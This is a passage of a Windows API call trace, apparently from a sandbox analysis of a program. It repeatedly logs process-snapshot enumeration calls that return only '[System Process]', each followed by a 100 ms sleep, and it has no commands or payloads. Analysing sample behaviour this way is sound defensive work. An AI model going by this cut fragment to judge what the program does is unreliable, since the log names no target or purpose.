lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.623] Sleep (dwMilliseconds=0x64) [0231.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0231.847] Process32FirstW (in: hSnapshot=0x388, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.853] Sleep (dwMilliseconds=0x64) [0231.969] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x38c [0231.971] Process32FirstW (in: hSnapshot=0x38c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.977] Sleep (dwMilliseconds=0x64) [0232.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x390 [0232.085] Process32FirstW (in: hSnapshot=0x390, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.091] Sleep (dwMilliseconds=0x64) [0232.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x394 [0232.202] Process32FirstW (in: hSnapshot=0x394, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.209] Sleep (dwMilliseconds=0x64) [0232.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398 [0232.331] Process32FirstW (in: hSnapshot=0x398, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.337] Sleep (dwMilliseconds=0x64) [0232.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x39c [0232.689] Process32FirstW (in: hSnapshot=0x39c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.694] Sleep (dwMilliseconds=0x64) [0232.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a0 [0232.830] Process32FirstW (in: hSnapshot=0x3a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.836] Sleep (dwMilliseconds=0x64) [0232.969] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0232.971] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.976] Sleep (dwMilliseconds=0x64) [0233.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0233.080] Process32FirstW (in: hSnapshot=0x3a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.086] Sleep (dwMilliseconds=0x64) [0233.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0233.189] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.195] Sleep (dwMilliseconds=0x64) [0233.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b0 [0233.298] Process32FirstW (in: hSnapshot=0x3b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.304] Sleep (dwMilliseconds=0x64) [0233.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b4 [0233.410] Process32FirstW (in: hSnapshot=0x3b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.415] Sleep (dwMilliseconds=0x64) [0233.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b8 [0233.517] Process32FirstW (in: hSnapshot=0x3b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.523] Sleep (dwMilliseconds=0x64) [0233.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3bc [0233.626] Process32FirstW (in: hSnapshot=0x3bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.632] Sleep (dwMilliseconds=0x64) [0233.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c0 [0233.736] Process32FirstW (in: hSnapshot=0x3c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.741] Sleep (dwMilliseconds=0x64) [0233.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c4 [0233.844] Process32FirstW (in: hSnapshot=0x3c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.850] Sleep (dwMilliseconds=0x64) [0233.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c8 [0233.953] Process32FirstW (in: hSnapshot=0x3c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.959] Sleep (dwMilliseconds=0x64) [0234.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3cc [0234.063] Process32FirstW (in: hSnapshot=0x3cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.068] Sleep (dwMilliseconds=0x64) [0234.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0 [0234.193] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.199] Sleep (dwMilliseconds=0x64) [0234.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d4 [0234.305] Process32FirstW (in: hSnapshot=0x3d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.310] Sleep (dwMilliseconds=0x64) [0234.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d8 [0234.417] Process32FirstW (in: hSnapshot=0x3d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.423] Sleep (dwMilliseconds=0x64) [0234.537] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3dc [0234.538] Process32FirstW (in: hSnapshot=0x3dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.544] Sleep (dwMilliseconds=0x64) [0234.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e0 [0234.640] Process32FirstW (in: hSnapshot=0x3e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.646] Sleep (dwMilliseconds=0x64) [0234.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e4 [0234.761] Process32FirstW (in: hSnapshot=0x3e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.767] Sleep (dwMilliseconds=0x64) [0234.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8 [0234.904] Process32FirstW (in: hSnapshot=0x3e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.910] Sleep (dwMilliseconds=0x64) [0235.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ec [0235.143] Process32FirstW (in: hSnapshot=0x3ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.148] Sleep (dwMilliseconds=0x64) [0235.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f0 [0235.265] Process32FirstW (in: hSnapshot=0x3f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.270] Sleep (dwMilliseconds=0x64) [0235.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f4 [0235.393] Process32FirstW (in: hSnapshot=0x3f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.398] Sleep (dwMilliseconds=0x64) [0235.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f8 [0235.514] Process32FirstW (in: hSnapshot=0x3f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.520] Sleep (dwMilliseconds=0x64) [0235.621] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3fc [0235.623] Process32FirstW (in: hSnapshot=0x3fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.628] Sleep (dwMilliseconds=0x64) [0235.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x404 [0235.935] Process32FirstW (in: hSnapshot=0x404, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.941] Sleep (dwMilliseconds=0x64) [0236.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x408 [0236.061] Process32FirstW (in: hSnapshot=0x408, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.067] Sleep (dwMilliseconds=0x64) [0236.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x40c [0236.169] Process32FirstW (in: hSnapshot=0x40c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.175] Sleep (dwMilliseconds=0x64) [0236.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x410 [0236.367] Process32FirstW (in: hSnapshot=0x410, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.391] Sleep (dwMilliseconds=0x64) [0236.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x414 [0236.497] Process32FirstW (in: hSnapshot=0x414, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.502] Sleep (dwMilliseconds=0x64) [0236.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x418 [0236.689] Process32FirstW (in: hSnapshot=0x418, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.695] Sleep (dwMilliseconds=0x64) [0236.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x41c [0236.855] Process32FirstW (in: hSnapshot=0x41c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.861] Sleep (dwMilliseconds=0x64) [0236.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x420 [0236.965] Process32FirstW (in: hSnapshot=0x420, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.970] Sleep (dwMilliseconds=0x64) [0237.072] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x424 [0237.074] Process32FirstW (in: hSnapshot=0x424, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.079] Sleep (dwMilliseconds=0x64) [0237.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x428 [0237.183] Process32FirstW (in: hSnapshot=0x428, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.189] Sleep (dwMilliseconds=0x64) [0237.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x42c [0237.323] Process32FirstW (in: hSnapshot=0x42c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.329] Sleep (dwMilliseconds=0x64) [0237.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0237.433] Process32FirstW (in: hSnapshot=0x430, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.438] Sleep (dwMilliseconds=0x64) [0237.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x434 [0237.541] Process32FirstW (in: hSnapshot=0x434, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.547] Sleep (dwMilliseconds=0x64) [0237.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x438 [0237.651] Process32FirstW (in: hSnapshot=0x438, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.657] Sleep (dwMilliseconds=0x64) [0237.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x43c [0237.760] Process32FirstW (in: hSnapshot=0x43c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.766] Sleep (dwMilliseconds=0x64) [0237.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x440 [0237.869] Process32FirstW (in: hSnapshot=0x440, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.875] Sleep (dwMilliseconds=0x64) [0237.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x444 [0238.001] Process32FirstW (in: hSnapshot=0x444, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.007] Sleep (dwMilliseconds=0x64) [0238.102] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x448 [0238.103] Process32FirstW (in: hSnapshot=0x448, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.109] Sleep (dwMilliseconds=0x64) [0238.211] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x44c [0238.212] Process32FirstW (in: hSnapshot=0x44c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.218] Sleep (dwMilliseconds=0x64) [0238.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x450 [0238.321] Process32FirstW (in: hSnapshot=0x450, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.329] Sleep (dwMilliseconds=0x64) [0238.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x454 [0238.431] Process32FirstW (in: hSnapshot=0x454, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.436] Sleep (dwMilliseconds=0x64) [0238.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x458 [0238.540] Process32FirstW (in: hSnapshot=0x458, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.545] Sleep (dwMilliseconds=0x64) [0238.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x45c [0238.651] Process32FirstW (in: hSnapshot=0x45c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.657] Sleep (dwMilliseconds=0x64) [0238.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x460 [0238.759] Process32FirstW (in: hSnapshot=0x460, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.004] Sleep (dwMilliseconds=0x64) [0239.100] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x464 [0239.101] Process32FirstW (in: hSnapshot=0x464, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.107] Sleep (dwMilliseconds=0x64) [0239.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x468 [0239.211] Process32FirstW (in: hSnapshot=0x468, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.217] Sleep (dwMilliseconds=0x64) [0239.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x46c [0239.320] Process32FirstW (in: hSnapshot=0x46c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.326] Sleep (dwMilliseconds=0x64) [0239.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x470 [0239.648] Process32FirstW (in: hSnapshot=0x470, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.654] Sleep (dwMilliseconds=0x64) [0239.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x474 [0239.759] Process32FirstW (in: hSnapshot=0x474, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 